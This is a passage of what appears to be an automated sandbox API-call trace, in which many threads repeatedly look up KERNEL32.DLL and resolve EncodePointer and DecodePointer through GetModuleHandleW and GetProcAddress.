GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0160.013] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 142 os_tid = 0xbd4 [0159.875] SysReAllocStringLen (in: pbstr=0x1756f744*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1756f744*="KERNEL32.DLL") returned 1 [0159.875] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.876] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.878] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.879] SysReAllocStringLen (in: pbstr=0x1756f744*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1756f744*="KERNEL32.DLL") returned 1 [0159.879] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.879] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.881] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.882] SysReAllocStringLen (in: pbstr=0x1756f720*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1756f720*="KERNEL32.DLL") returned 1 [0159.882] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.882] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.885] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0159.887] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0160.604] SysReAllocStringLen (in: pbstr=0x1756f9f8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1756f9f8*="KERNEL32.DLL") returned 1 [0160.604] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0160.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0160.608] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 143 os_tid = 0x630 [0162.087] SysReAllocStringLen (in: pbstr=0x170df60c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170df60c*="KERNEL32.DLL") returned 1 [0162.087] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0162.087] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0162.090] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0162.090] SysReAllocStringLen (in: pbstr=0x170df60c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170df60c*="KERNEL32.DLL") returned 1 [0162.090] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0162.090] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0162.092] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0162.093] SysReAllocStringLen (in: pbstr=0x170df5e8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170df5e8*="KERNEL32.DLL") returned 1 [0162.093] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0162.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0162.095] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0162.098] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0162.480] SysReAllocStringLen (in: pbstr=0x170df8c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170df8c0*="KERNEL32.DLL") returned 1 [0162.481] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0162.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0162.484] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 144 os_tid = 0xb68 [0162.504] SysReAllocStringLen (in: pbstr=0x16fdf37c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdf37c*="KERNEL32.DLL") returned 1 [0162.504] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0162.505] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0162.508] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0162.508] SysReAllocStringLen (in: pbstr=0x16fdf37c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdf37c*="KERNEL32.DLL") returned 1 [0162.508] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0162.509] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0162.512] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0162.512] SysReAllocStringLen (in: pbstr=0x16fdf358*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdf358*="KERNEL32.DLL") returned 1 [0162.512] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0162.513] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0162.516] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0162.519] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0163.460] SysReAllocStringLen (in: pbstr=0x16fdf630*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdf630*="KERNEL32.DLL") returned 1 [0163.460] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.460] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.463] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 145 os_tid = 0xab4 [0163.144] SysReAllocStringLen (in: pbstr=0x1715fa5c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1715fa5c*="KERNEL32.DLL") returned 1 [0163.144] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.145] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.147] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0163.148] SysReAllocStringLen (in: pbstr=0x1715fa5c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1715fa5c*="KERNEL32.DLL") returned 1 [0163.148] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.151] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0163.151] SysReAllocStringLen (in: pbstr=0x1715fa38*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1715fa38*="KERNEL32.DLL") returned 1 [0163.151] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.154] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0163.156] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0163.593] SysReAllocStringLen (in: pbstr=0x1715fd10*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1715fd10*="KERNEL32.DLL") returned 1 [0163.594] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.594] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.597] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 146 os_tid = 0x5f4 [0163.803] SysReAllocStringLen (in: pbstr=0x16fdfb2c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdfb2c*="KERNEL32.DLL") returned 1 [0163.803] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.803] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.807] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0163.807] SysReAllocStringLen (in: pbstr=0x16fdfb2c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdfb2c*="KERNEL32.DLL") returned 1 [0163.807] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.808] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.811] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0163.811] SysReAllocStringLen (in: pbstr=0x16fdfb08*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdfb08*="KERNEL32.DLL") returned 1 [0163.811] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0163.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0163.814] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0163.817] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0164.818] SysReAllocStringLen (in: pbstr=0x16fdfde0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16fdfde0*="KERNEL32.DLL") returned 1 [0164.818] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0164.823] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.826] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 147 os_tid = 0x9d8 [0167.579] SysReAllocStringLen (in: pbstr=0xb5df904*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5df904*="KERNEL32.DLL") returned 1 [0167.579] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.580] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.583] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.583] SysReAllocStringLen (in: pbstr=0xb5df904*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5df904*="KERNEL32.DLL") returned 1 [0167.583] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.587] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.587] SysReAllocStringLen (in: pbstr=0xb5df8e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5df8e0*="KERNEL32.DLL") returned 1 [0167.587] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.591] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.595] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0168.000] SysReAllocStringLen (in: pbstr=0xb5dfbb8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5dfbb8*="KERNEL32.DLL") returned 1 [0168.000] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0168.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0168.003] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 148 os_tid = 0x918 [0167.766] SysReAllocStringLen (in: pbstr=0xb6ffb04*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ffb04*="KERNEL32.DLL") returned 1 [0167.766] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.770] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.770] SysReAllocStringLen (in: pbstr=0xb6ffb04*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ffb04*="KERNEL32.DLL") returned 1 [0167.771] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.771] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.774] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.775] SysReAllocStringLen (in: pbstr=0xb6ffae0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ffae0*="KERNEL32.DLL") returned 1 [0167.775] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.775] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.778] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.782] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0168.674] SysReAllocStringLen (in: pbstr=0xb6ffdb8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6ffdb8*="KERNEL32.DLL") returned 1 [0168.674] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0168.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0168.678] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 149 os_tid = 0x5c4 [0170.725] SysReAllocStringLen (in: pbstr=0x657f8cc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f8cc*="KERNEL32.DLL") returned 1 [0170.725] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0170.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0170.728] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0170.728] SysReAllocStringLen (in: pbstr=0x657f8cc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f8cc*="KERNEL32.DLL") returned 1 [0170.728] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0170.729] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0170.731] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0170.732] SysReAllocStringLen (in: pbstr=0x657f8a8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f8a8*="KERNEL32.DLL") returned 1 [0170.732] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0170.732] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0170.735] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0170.738] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.159] SysReAllocStringLen (in: pbstr=0x657fb80*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657fb80*="KERNEL32.DLL") returned 1 [0171.159] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0171.159] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.162] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 150 os_tid = 0x3a4 [0170.980] SysReAllocStringLen (in: pbstr=0xb69f59c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f59c*="KERNEL32.DLL") returned 1 [0170.980] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0170.980] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0170.983] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0170.983] SysReAllocStringLen (in: pbstr=0xb69f59c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f59c*="KERNEL32.DLL") returned 1 [0170.983] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0170.983] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0170.986] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0170.986] SysReAllocStringLen (in: pbstr=0xb69f578*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f578*="KERNEL32.DLL") returned 1 [0170.986] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0170.987] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0170.989] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0170.991] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.529] SysReAllocStringLen (in: pbstr=0xb69f850*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f850*="KERNEL32.DLL") returned 1 [0171.530] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0171.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.533] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 151 os_tid = 0xba0 [0171.535] SysReAllocStringLen (in: pbstr=0x1693f99c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1693f99c*="KERNEL32.DLL") returned 1 [0171.535] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0171.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.538] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.539] SysReAllocStringLen (in: pbstr=0x1693f99c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1693f99c*="KERNEL32.DLL") returned 1 [0171.539] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0171.539] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.541] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.542] SysReAllocStringLen (in: pbstr=0x1693f978*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1693f978*="KERNEL32.DLL") returned 1 [0171.542] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0171.542] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.544] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0171.547] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0171.978] SysReAllocStringLen (in: pbstr=0x1693fc50*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1693fc50*="KERNEL32.DLL") returned 1 [0171.978] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0171.978] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.981] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 154 os_tid = 0xb24 [0175.834] SysReAllocStringLen (in: pbstr=0xb5cfaec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5cfaec*="KERNEL32.DLL") returned 1 [0175.834] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0175.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0175.836] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0175.837] SysReAllocStringLen (in: pbstr=0xb5cfaec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5cfaec*="KERNEL32.DLL") returned 1 [0175.837] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0175.837] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0175.839] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0175.839] SysReAllocStringLen (in: pbstr=0xb5cfac8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5cfac8*="KERNEL32.DLL") returned 1 [0175.839] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0175.840] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0175.842] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0175.845] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0176.961] SysReAllocStringLen (in: pbstr=0xb5cfda0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5cfda0*="KERNEL32.DLL") returned 1 [0176.961] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0176.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0176.965] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 155 os_tid = 0xb6c [0175.846] SysReAllocStringLen (in: pbstr=0x168ff4cc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff4cc*="KERNEL32.DLL") returned 1 [0175.846] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0175.847] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0175.849] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0175.850] SysReAllocStringLen (in: pbstr=0x168ff4cc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff4cc*="KERNEL32.DLL") returned 1 [0175.850] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0175.850] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0175.852] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0175.852] SysReAllocStringLen (in: pbstr=0x168ff4a8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff4a8*="KERNEL32.DLL") returned 1 [0175.852] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0175.853] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0175.855] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0175.857] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0176.968] SysReAllocStringLen (in: pbstr=0x168ff780*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff780*="KERNEL32.DLL") returned 1 [0176.968] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0176.968] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0176.971] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 156 os_tid = 0xbac [0177.115] SysReAllocStringLen (in: pbstr=0x58afa54*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58afa54*="KERNEL32.DLL") returned 1 [0177.115] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.119] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.119] SysReAllocStringLen (in: pbstr=0x58afa54*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58afa54*="KERNEL32.DLL") returned 1 [0177.120] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.120] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.123] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.124] SysReAllocStringLen (in: pbstr=0x58afa30*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58afa30*="KERNEL32.DLL") returned 1 [0177.124] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.124] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.128] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0177.131] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.173] SysReAllocStringLen (in: pbstr=0x58afd08*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58afd08*="KERNEL32.DLL") returned 1 [0177.173] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.173] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.176] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 157 os_tid = 0xa08 [0177.135] SysReAllocStringLen (in: pbstr=0x169ff814*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x169ff814*="KERNEL32.DLL") returned 1 [0177.135] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.136] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.139] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.139] SysReAllocStringLen (in: pbstr=0x169ff814*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x169ff814*="KERNEL32.DLL") returned 1 [0177.139] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.143] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.143] SysReAllocStringLen (in: pbstr=0x169ff7f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x169ff7f0*="KERNEL32.DLL") returned 1 [0177.143] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.144] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.147] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0177.150] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 158 os_tid = 0x360 [0179.876] SysReAllocStringLen (in: pbstr=0xb66f79c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66f79c*="KERNEL32.DLL") returned 1 [0179.876] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.877] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.880] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.880] SysReAllocStringLen (in: pbstr=0xb66f79c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66f79c*="KERNEL32.DLL") returned 1 [0179.880] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc 